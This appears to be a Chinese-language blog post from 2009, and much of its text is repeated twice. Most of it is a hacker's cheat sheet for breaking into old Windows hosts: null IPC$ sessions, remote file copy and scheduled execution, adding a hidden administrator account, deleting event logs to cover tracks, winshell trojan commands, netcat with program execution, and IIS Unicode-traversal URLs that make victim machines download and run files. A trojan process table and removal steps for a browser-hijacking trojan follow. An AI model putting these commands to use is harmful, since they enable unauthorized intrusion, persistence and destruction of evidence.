常用的几条NET 命令
作者:wang 日期:2009-03-11
==================================================
(与远程主机建立空管连接)net use \\IP 地址\ipc$ "" /use:""
(以管理员身份登录远程主机)net use \\IP 地址\ipc$ "密码" /use:"Administrator"
(传送文件到远程主机WINNT 目录下)copy 本机目录路径\程序\\IP 地址\admin$
(查看远程主机时间)net time \\IP 地址
(定时启动某个程序)at \\IP 地址02:18 readme.exe
(查看共享)net view \\IP 地址
(查看netbios 工作组列表)nbtstat -A IP 地址
(将远程主机C 盘映射为自己的F 盘)net use f: \\IP 地址\c$ ""/user:"Administrator"
(这两条把自己增加到管理员组):net user 用户名 密码/add
net localgroup Administrators 用户名/add
(断开连接)net use \\IP 地址\ipc$ /delete
=====================================================
擦屁屁:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
============================
一、netsvc.exe
----------------------- 页面 2-----------------------
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc /list \\IP 地址
netsvc schedule \\IP 地址/query
netsvc \\IP 地址 schedule /start
二、OpenTelnet.exe
远程启动主机的Telnet 服务,并 定端口到7878,例如:
OpenTelnet \\IP 地址用户名 密码 1 7878
然后就可以telnet 到主机的7878 端口,进入DOS 方式下:
telnet IP 地址 7878
三、winshell.exe
一个非 小的木马 (不到6K),telnet 到主机的7878 端口,输入密码winshell,当看到CMD>后,可打下
面的命令:
p Path (查看winshell 主程序的路径信息)
b reBoot (重新启动机器)
d shutDown (关闭机器)
s Shell (执行后你就会看到可爱的“C:\> ”)
x eXit (退出本次登录会话,此命令并不终止winshell 的运行)
CMD> http://.../srv.exe (通过http 下载其他网站上的文件到运行winshell 的机器上)
四、3389 登陆器,GUI 方式登录远程主机的
五、elsave.exe
事件日志清除工具
elsave -s \\IP 地址-l "application" -C
elsave -s \\IP 地址-l "system" -C
elsave -s \\IP 地址-l "security" -C
执行后成功清除应用程序日志,系统日志,安全日志
----------------------- 页面 3-----------------------
六、hbulot.exe
开启win2kserver 和winxp 的3389 服务
hbulot [/r]
使用/r 表示安装完成后自动重起目标使设置生效。
七、nc.exe(netcat.exe)
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
想要连接到某处: nc [-options] hostname port[s] [ports] ...
定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危 !!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP 地址,不能用hostname
-o file 记录16 进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP 模式
-v 详细输出——用两个-v 可得到更详细的内容
-w secs timeout 的时间
-z 将输入输出关掉——用于扫描时
八、TFTPD32.EXE
----------------------- 页面 4-----------------------
把自己的电脑临时变为一台FTP 服务器,让肉鸡来下载文件,tftp 命令要在肉鸡上执行,通 要利用Unicode
漏洞或telnet 到肉鸡,例如:
http://IP 地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机 IP 地址 get 文件名
c:\winnt\system32\文件名
然后可以直接令文件运行:
http://IP 地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe 是IIS 的printer 远程缓冲区溢出工具。idqover.exe 是溢出idq 的,选择“溢出后在一个端
口监听”,然后用telnet 连接它的监听端口,如果溢出成功,一连它的端口, 定的命令马上执行。xploit.exe
是一个图形界面的ida 溢出,成功以后winxp 下需要打winxp。
一○、ntis.exe、cmd.exe 和cmdasp.asp 是三个cgi-backdoor,exe 要放到cgi-bin 目录下,asp 放到有ASP 执
行权限的目录。然后用IE 浏览器连接。
一、一Xscan 命令行运行参数说明:
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按
""强行关闭程序。
1.命令格式: xscan -host [-] [其他选项]
xscan -file [其他选项]
其中含义如下:
-port : 检测 用服务的端口状态(可通过\dat\config.ini 文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制
待检测端口列表);
-ftp : 检测FTP 弱口令(可通过\dat\config.ini 文件设置用户名/密码字典文件);
-ntpass : 检测NT-Server 弱口令(可通过\dat\config.ini 文件设置用户名/密码字典文件);
-cgi : 检测CGI 漏洞(可通过\dat\config.ini 文件的"CGI-ENCODE\encode_type"项设置编码方案);
-iis : 检测IIS 漏洞(可通过\dat\config.ini 文件的"CGI-ENCODE\encode_type"项设置编码方案);
[其他选项] 含义如下:
-v: 显示详细扫描进度
-p: 跳过Ping 不通的主机
-o: 跳过没有检测到开放端口的主机
-t : 指定最大并发线程数量和并发主机数量, 默 数量为100,10
----------------------- 页面 5-----------------------
见病毒、木马进程速查表
exe →BF Evolution Mbbmanager.exe →聪明基因
_.exe →Tryit Mdm.exe →Doly 1.6-1.7
Aboutagirl.exe →初恋情人 Microsoft.exe →传奇密码使者
Absr.exe →Backdoor.Autoupder Mmc.exe →尼姆达病毒
Aplica32.exe →将死者病毒 Mprdll.exe →Bla
Avconsol.exe →将死者病毒 Msabel32.exe →Cain and Abel
Avp.exe →将死者病毒 Msblast.exe →冲击波病毒
Avp32.exe →将死者病毒 Mschv.exe →Control
Avpcc.exe →将死者病毒 Msgsrv36.exe →Coma
Avpm.exe →将死者病毒 Msgsvc.exe →火凤凰
Avserve.exe →震荡波病毒 Msgsvr16.exe →Acid Shiver
Bbeagle.exe →恶鹰蠕虫病毒 Msie5.exe →Canasson
Brainspy.exe →BrainSpy vBeta Msstart.exe →Backdoor.livup
Cfiadmin.exe →将死者病毒 Mstesk.exe →Doly 1.1-1.5
Cfiaudit.exe →将死者病毒 Netip.exe →Spirit 2000 Beta
Cfinet32.exe →将死者病毒 Netspy.exe → 网络精灵
Checkdll.exe → 网络公牛 Notpa.exe →Backdoor
Cmctl32.exe →Back Construction Odbc.exe →Telecommando
Command.exe →AOL Trojan Pcfwallicon.exe →将死者病毒
Diagcfg.exe →广外女生 Pcx.exe →Xplorer
Dkbdll.exe →Der Spaeher Pw32.exe →将死者病毒
Dllclient.exe →Bobo Recycle - Bin.exe →s**tHeap
Dvldr32.exe → 口令病毒 Regscan.exe →波特后门变种
Esafe.exe →将死者病毒 Tftp.exe →尼姆达病毒
Expiorer.exe →Acid Battery Thing.exe →Thing
Feweb.exe →将死者病毒 User.exe →Schwindler
Flcss.exe →Funlove 病毒 Vp32.exe →将死者病毒
Frw.exe →将死者病毒 Vpcc.exe →将死者病毒
Icload95.exe →将死者病毒 Vpm.exe →将死者病毒
Icloadnt.exe →将死者病毒 Vsecomr.exe →将死者病毒
Icmon.exe →将死者病毒 Server.exe →Revenger, WinCrash, YAT
Icsupp95.exe →将死者病毒 Service.exe →Trinoo
Iexplore.exe →恶邮差病毒 Setup.exe →密码病毒或Xanadu
Rpcsrv.exe →恶邮差病毒 Sockets.exe →Vampire
Rundll.exe →SCKISS 爱情森林 Something.exe →BladeRunner
Rundll32.exe→狩猎者病毒 Spfw.exe →瑞波变种PX
Runouce.exe → 中国黑客病毒 Svchost.exe (线程105) →蓝色代码
Scanrew.exe →传奇终结者 Sysedit32.exe →SCKISS 爱情森林
Scvhost.exe →安哥病毒 Sy***plor.exe →wCrat
Server 1. 2.exe →Spirit 2000 1.2fixed Sy***plr.exe →冰河
Intel.exe →传奇叛逆 Syshelp.exe →恶邮差病毒
Internet.exe →传奇幽灵 Sysprot.exe →Satans Back Door
Internet.exe → 网络神偷 Sysrunt.exe →Ripper
----------------------- 页面 6-----------------------
Kernel16.exe →Transmission Scount System.exe →s**tHeap
Kernel32.exe →坏透了或冰河 System32.exe →DeepThroat 1.0
Kiss.exe →传奇天使 Systray.exe →DeepThroat 2.0-3.1
Krn132.exe →求职信病毒 Syswindow.exe →Trojan Cow
Libupdate.exe →BioNet Task_Bar.exe →WebEx
Load.exe →尼姆达病毒 Taskbar →密码病毒Frethem
Lockdown2000.exe →将死者病毒 Taskmon.exe →诺维格蠕虫病毒
Taskmon32 →传奇黑眼睛 Tds2-98.exe →将死者病毒
Tds2-Nt.exe →将死者病毒 Temp $01.exe →Snid
Tempinetb00st.exe →The Unexplained Tempserver.exe →Delta Source
Vshwin32.exe →将死者病毒 Vsstart.exe →将死者病毒
Vw32.exe →将死者病毒 Windown.exe →Spirit 2000 1.2
Windows.exe →黑洞2000 Winfunctions.exe →Dark Shadow
Wingate.exe →恶邮差病毒 Wink????.exe →求职信病毒
Winl0g0n.exe →笑哈哈病毒 Winmgm32.exe → 巨无霸病毒
Winmsg32.exe →Xtcp Winprot.exe →Chupachbra
Winprotecte.exe →Stealth Winrpc.exe →恶邮差病毒
Winrpcsrv.exe →恶邮差病毒 Winserv.exe →Softwarst
Wubsys.exe →传奇猎手 Winupdate.exe →Sckiss 爱情森林
Winver.exe →Sckiss 爱情森林 Winvnc.exe →恶邮差病毒
Winzip.exe →ShadowPhyre Wqk.exe →求职信病毒
Wscan.exe →AttackFTP Xx.Tmp.exe →尼姆达病毒
Zcn32.exe →Ambush Zonealarm.exe →将死者病毒
首页被7939.com 锁定的解决方案
病毒名称:诡秘下载器变种CXW(Trojan.DL.Delf.cxw)
病毒类型:流氓软件
病毒危害级别:★★★
病毒发作现象及危害:
该病毒运行后会从黑客指定的网站下载指令并运行,会将用户IE 浏览器的主页锁定为一个名叫“7939
上网导航”的网站,以提高该网站的访问量,该病毒会试图禁止多种安全工具软件运行,并会造成一些主
流杀毒软件运行不正常,它还会自动从http//down.Viru??ky.com 下载新的病毒并运行。
手工清除:
一、清除内存中的病毒
在任务管理器中找到名为“Realplayer.exe”和“Explorer.exe ”的进程,单击鼠标右键,选择“结束进
程”。
“Explorer.exe”进程被结束后将会看不到桌面图标和任务栏,这时按住Ctrl+Alt+Del 键,启动任务管
理器,点击菜单“文件”-》“新建任务(运行…)”,输入“explorer.exe ”,点击“确定”。
----------------------- 页面 7-----------------------
二、删除病毒文件
1、打开“我的电脑”,选择菜单“工具”-》“文件夹选项”,点击“查看”,取消“隐藏已知类型文件
的扩展名”前的对勾,然后点击“确定”。
2、进入Windows 系统文件目录下(默 为C:WindowsSystem32),删除掉“realplayer.exe”、“brlmon.dll”
(部分变种dll 文件的名称为ravmon.dll)两个文件。
三、修复注册表
1、点击“开始”菜单,选择“运行”,输入“regedit.exe ”并确定,打开注册表编辑器。
2、打开HKEY_CURRENT_USER /Software /Microsoft /Windows /CurrentVersionRun,在右边的窗格中
找到“Realplayer.exe”一项,将其删除。
3、打开HKEY_LOCAL_MACHINE /SOFTWARE /Microsoft /Windows /CurrentVersionRun,在右边的
窗格中找到“Realplayer.exe”一项,将其删除。
4、打开HKEY_LOCAL_MACHINE /SOFTWARE,将其下的“Microsoft NT ”目录整个删除(包含其
下的子项)。
5、打开HKEY_LOCAL_MACHINE /SOFTWARE /Microsoft,将其下的“RunDown ”目录整个删除(包
含其下的子项)。
四、修复IE 首页
打开IE 浏览器,点击菜单“工具”-》“Internet 选项”,打开“ 规”选项页,在“主页”处自行设
置IE 的主页地址。
用杀毒软件清除:
由于该病毒变种繁多,DLL 文件名称不固定,手工清除有一定困难,建议用户使用瑞星杀毒软件进行
清除。清除该病毒时需注意以下三点:
1、必须在杀毒软件的查杀目标中勾选“内存”
由于该病毒会注入到系统进程当中,因此查杀该病毒必须先对内存进行检查,否则可能出现查杀失败。
2、杀毒后需重新启动计算机
瑞星在查到该病毒时会提示用户“重新启动计算机后删除文件”。用户只需在杀毒完毕后立即重新启
动计算机即可清除该病毒。
(与远程主机建立空管连接)net use \\IP 地址\ipc$ "" /use:""
(以管理员身份登录远程主机)net use \\IP 地址\ipc$ "密码" /use:"Administrator"
(传送文件到远程主机WINNT 目录下)copy 本机目录路径\程序\\IP 地址\admin$
(查看远程主机时间)net time \\IP 地址
(定时启动某个程序)at \\IP 地址02:18 readme.exe
(查看共享)net view \\IP 地址
(查看netbios 工作组列表)nbtstat -A IP 地址
(将远程主机C 盘映射为自己的F 盘)net use f: \\IP 地址\c$ ""/user:"Administrator"
(这两条把自己增加到管理员组):net user 用户名 密码/add
net localgroup Administrators 用户名/add
(断开连接)net use \\IP 地址\ipc$ /delete
=====================================================
擦屁屁:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
============================
一、netsvc.exe
----------------------- 页面 2-----------------------
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc /list \\IP 地址
netsvc schedule \\IP 地址/query
netsvc \\IP 地址 schedule /start
二、OpenTelnet.exe
远程启动主机的Telnet 服务,并 定端口到7878,例如:
OpenTelnet \\IP 地址用户名 密码 1 7878
然后就可以telnet 到主机的7878 端口,进入DOS 方式下:
telnet IP 地址 7878
三、winshell.exe
一个非 小的木马 (不到6K),telnet 到主机的7878 端口,输入密码winshell,当看到CMD>后,可打下
面的命令:
p Path (查看winshell 主程序的路径信息)
b reBoot (重新启动机器)
d shutDown (关闭机器)
s Shell (执行后你就会看到可爱的“C:\> ”)
x eXit (退出本次登录会话,此命令并不终止winshell 的运行)
CMD> http://.../srv.exe (通过http 下载其他网站上的文件到运行winshell 的机器上)
四、3389 登陆器,GUI 方式登录远程主机的
五、elsave.exe
事件日志清除工具
elsave -s \\IP 地址-l "application" -C
elsave -s \\IP 地址-l "system" -C
elsave -s \\IP 地址-l "security" -C
执行后成功清除应用程序日志,系统日志,安全日志
----------------------- 页面 3-----------------------
六、hbulot.exe
开启win2kserver 和winxp 的3389 服务
hbulot [/r]
使用/r 表示安装完成后自动重起目标使设置生效。
七、nc.exe(netcat.exe)
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
想要连接到某处: nc [-options] hostname port[s] [ports] ...
定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危 !!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP 地址,不能用hostname
-o file 记录16 进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP 模式
-v 详细输出——用两个-v 可得到更详细的内容
-w secs timeout 的时间
-z 将输入输出关掉——用于扫描时
八、TFTPD32.EXE
----------------------- 页面 4-----------------------
把自己的电脑临时变为一台FTP 服务器,让肉鸡来下载文件,tftp 命令要在肉鸡上执行,通 要利用Unicode
漏洞或telnet 到肉鸡,例如:
http://IP 地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机 IP 地址 get 文件名
c:\winnt\system32\文件名
然后可以直接令文件运行:
http://IP 地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe 是IIS 的printer 远程缓冲区溢出工具。idqover.exe 是溢出idq 的,选择“溢出后在一个端
口监听”,然后用telnet 连接它的监听端口,如果溢出成功,一连它的端口, 定的命令马上执行。xploit.exe
是一个图形界面的ida 溢出,成功以后winxp 下需要打winxp。
一○、ntis.exe、cmd.exe 和cmdasp.asp 是三个cgi-backdoor,exe 要放到cgi-bin 目录下,asp 放到有ASP 执
行权限的目录。然后用IE 浏览器连接。
一、一Xscan 命令行运行参数说明:
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按
""强行关闭程序。
1.命令格式: xscan -host [-] [其他选项]
xscan -file [其他选项]
其中含义如下:
-port : 检测 用服务的端口状态(可通过\dat\config.ini 文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制
待检测端口列表);
-ftp : 检测FTP 弱口令(可通过\dat\config.ini 文件设置用户名/密码字典文件);
-ntpass : 检测NT-Server 弱口令(可通过\dat\config.ini 文件设置用户名/密码字典文件);
-cgi : 检测CGI 漏洞(可通过\dat\config.ini 文件的"CGI-ENCODE\encode_type"项设置编码方案);
-iis : 检测IIS 漏洞(可通过\dat\config.ini 文件的"CGI-ENCODE\encode_type"项设置编码方案);
[其他选项] 含义如下:
-v: 显示详细扫描进度
-p: 跳过Ping 不通的主机
-o: 跳过没有检测到开放端口的主机
-t : 指定最大并发线程数量和并发主机数量, 默 数量为100,10
----------------------- 页面 5-----------------------
见病毒、木马进程速查表
exe →BF Evolution Mbbmanager.exe →聪明基因
_.exe →Tryit Mdm.exe →Doly 1.6-1.7
Aboutagirl.exe →初恋情人 Microsoft.exe →传奇密码使者
Absr.exe →Backdoor.Autoupder Mmc.exe →尼姆达病毒
Aplica32.exe →将死者病毒 Mprdll.exe →Bla
Avconsol.exe →将死者病毒 Msabel32.exe →Cain and Abel
Avp.exe →将死者病毒 Msblast.exe →冲击波病毒
Avp32.exe →将死者病毒 Mschv.exe →Control
Avpcc.exe →将死者病毒 Msgsrv36.exe →Coma
Avpm.exe →将死者病毒 Msgsvc.exe →火凤凰
Avserve.exe →震荡波病毒 Msgsvr16.exe →Acid Shiver
Bbeagle.exe →恶鹰蠕虫病毒 Msie5.exe →Canasson
Brainspy.exe →BrainSpy vBeta Msstart.exe →Backdoor.livup
Cfiadmin.exe →将死者病毒 Mstesk.exe →Doly 1.1-1.5
Cfiaudit.exe →将死者病毒 Netip.exe →Spirit 2000 Beta
Cfinet32.exe →将死者病毒 Netspy.exe → 网络精灵
Checkdll.exe → 网络公牛 Notpa.exe →Backdoor
Cmctl32.exe →Back Construction Odbc.exe →Telecommando
Command.exe →AOL Trojan Pcfwallicon.exe →将死者病毒
Diagcfg.exe →广外女生 Pcx.exe →Xplorer
Dkbdll.exe →Der Spaeher Pw32.exe →将死者病毒
Dllclient.exe →Bobo Recycle - Bin.exe →s**tHeap
Dvldr32.exe → 口令病毒 Regscan.exe →波特后门变种
Esafe.exe →将死者病毒 Tftp.exe →尼姆达病毒
Expiorer.exe →Acid Battery Thing.exe →Thing
Feweb.exe →将死者病毒 User.exe →Schwindler
Flcss.exe →Funlove 病毒 Vp32.exe →将死者病毒
Frw.exe →将死者病毒 Vpcc.exe →将死者病毒
Icload95.exe →将死者病毒 Vpm.exe →将死者病毒
Icloadnt.exe →将死者病毒 Vsecomr.exe →将死者病毒
Icmon.exe →将死者病毒 Server.exe →Revenger, WinCrash, YAT
Icsupp95.exe →将死者病毒 Service.exe →Trinoo
Iexplore.exe →恶邮差病毒 Setup.exe →密码病毒或Xanadu
Rpcsrv.exe →恶邮差病毒 Sockets.exe →Vampire
Rundll.exe →SCKISS 爱情森林 Something.exe →BladeRunner
Rundll32.exe→狩猎者病毒 Spfw.exe →瑞波变种PX
Runouce.exe → 中国黑客病毒 Svchost.exe (线程105) →蓝色代码
Scanrew.exe →传奇终结者 Sysedit32.exe →SCKISS 爱情森林
Scvhost.exe →安哥病毒 Sy***plor.exe →wCrat
Server 1. 2.exe →Spirit 2000 1.2fixed Sy***plr.exe →冰河
Intel.exe →传奇叛逆 Syshelp.exe →恶邮差病毒
Internet.exe →传奇幽灵 Sysprot.exe →Satans Back Door
Internet.exe → 网络神偷 Sysrunt.exe →Ripper
----------------------- 页面 6-----------------------
Kernel16.exe →Transmission Scount System.exe →s**tHeap
Kernel32.exe →坏透了或冰河 System32.exe →DeepThroat 1.0
Kiss.exe →传奇天使 Systray.exe →DeepThroat 2.0-3.1
Krn132.exe →求职信病毒 Syswindow.exe →Trojan Cow
Libupdate.exe →BioNet Task_Bar.exe →WebEx
Load.exe →尼姆达病毒 Taskbar →密码病毒Frethem
Lockdown2000.exe →将死者病毒 Taskmon.exe →诺维格蠕虫病毒
Taskmon32 →传奇黑眼睛 Tds2-98.exe →将死者病毒
Tds2-Nt.exe →将死者病毒 Temp $01.exe →Snid
Tempinetb00st.exe →The Unexplained Tempserver.exe →Delta Source
Vshwin32.exe →将死者病毒 Vsstart.exe →将死者病毒
Vw32.exe →将死者病毒 Windown.exe →Spirit 2000 1.2
Windows.exe →黑洞2000 Winfunctions.exe →Dark Shadow
Wingate.exe →恶邮差病毒 Wink????.exe →求职信病毒
Winl0g0n.exe →笑哈哈病毒 Winmgm32.exe → 巨无霸病毒
Winmsg32.exe →Xtcp Winprot.exe →Chupachbra
Winprotecte.exe →Stealth Winrpc.exe →恶邮差病毒
Winrpcsrv.exe →恶邮差病毒 Winserv.exe →Softwarst
Wubsys.exe →传奇猎手 Winupdate.exe →Sckiss 爱情森林
Winver.exe →Sckiss 爱情森林 Winvnc.exe →恶邮差病毒
Winzip.exe →ShadowPhyre Wqk.exe →求职信病毒
Wscan.exe →AttackFTP Xx.Tmp.exe →尼姆达病毒
Zcn32.exe →Ambush Zonealarm.exe →将死者病毒
首页被7939.com 锁定的解决方案
病毒名称:诡秘下载器变种CXW(Trojan.DL.Delf.cxw)
病毒类型:流氓软件
病毒危害级别:★★★
病毒发作现象及危害:
该病毒运行后会从黑客指定的网站下载指令并运行,会将用户IE 浏览器的主页锁定为一个名叫“7939
上网导航”的网站,以提高该网站的访问量,该病毒会试图禁止多种安全工具软件运行,并会造成一些主
流杀毒软件运行不正常,它还会自动从http//down.Viru??ky.com 下载新的病毒并运行。
手工清除:
一、清除内存中的病毒
在任务管理器中找到名为“Realplayer.exe”和“Explorer.exe ”的进程,单击鼠标右键,选择“结束进
程”。
“Explorer.exe”进程被结束后将会看不到桌面图标和任务栏,这时按住Ctrl+Alt+Del 键,启动任务管
理器,点击菜单“文件”-》“新建任务(运行…)”,输入“explorer.exe ”,点击“确定”。
----------------------- 页面 7-----------------------
二、删除病毒文件
1、打开“我的电脑”,选择菜单“工具”-》“文件夹选项”,点击“查看”,取消“隐藏已知类型文件
的扩展名”前的对勾,然后点击“确定”。
2、进入Windows 系统文件目录下(默 为C:WindowsSystem32),删除掉“realplayer.exe”、“brlmon.dll”
(部分变种dll 文件的名称为ravmon.dll)两个文件。
三、修复注册表
1、点击“开始”菜单,选择“运行”,输入“regedit.exe ”并确定,打开注册表编辑器。
2、打开HKEY_CURRENT_USER /Software /Microsoft /Windows /CurrentVersionRun,在右边的窗格中
找到“Realplayer.exe”一项,将其删除。
3、打开HKEY_LOCAL_MACHINE /SOFTWARE /Microsoft /Windows /CurrentVersionRun,在右边的
窗格中找到“Realplayer.exe”一项,将其删除。
4、打开HKEY_LOCAL_MACHINE /SOFTWARE,将其下的“Microsoft NT ”目录整个删除(包含其
下的子项)。
5、打开HKEY_LOCAL_MACHINE /SOFTWARE /Microsoft,将其下的“RunDown ”目录整个删除(包
含其下的子项)。
四、修复IE 首页
打开IE 浏览器,点击菜单“工具”-》“Internet 选项”,打开“ 规”选项页,在“主页”处自行设
置IE 的主页地址。
用杀毒软件清除:
由于该病毒变种繁多,DLL 文件名称不固定,手工清除有一定困难,建议用户使用瑞星杀毒软件进行
清除。清除该病毒时需注意以下三点:
1、必须在杀毒软件的查杀目标中勾选“内存”
由于该病毒会注入到系统进程当中,因此查杀该病毒必须先对内存进行检查,否则可能出现查杀失败。
2、杀毒后需重新启动计算机
瑞星在查到该病毒时会提示用户“重新启动计算机后删除文件”。用户只需在杀毒完毕后立即重新启
动计算机即可清除该病毒。
评论: 0 | 引用: 0 | 查看次数: 5583
发表评论